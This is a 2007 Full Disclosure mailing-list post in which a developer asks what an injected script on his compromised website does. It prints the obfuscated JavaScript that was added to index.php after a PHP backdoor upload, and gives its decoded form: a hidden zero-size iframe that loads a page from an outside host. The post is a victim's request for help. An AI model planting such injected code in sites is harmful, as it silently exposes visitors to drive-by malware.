Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

any idea what is going on here?
From: "Ian Shaw" <useraddr () gmail com>
Date: Thu, 4 Jan 2007 21:37:29 +0000

A website that I am developing has had BackDoor-CUS!php uploaded to the
images directory.  My faulty entirely due to permissions set.

This has resulted in

<html>
<script language="javascript">
s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
document.writeln(s);document.close();
</script>
</html>

being added to the top of index.php.

Unencoded this reads

iframe src="http://www.nownames.org/images/in.php?adv=3"; WIDTH="0%"
HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto"
frameborder="0" NORESIZE>

When I go to this an applet appear to run but I am not sure what doing.
Closed my browser out of fear.

Does anyone know what it is attempting to do?

Thanks
Ian
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault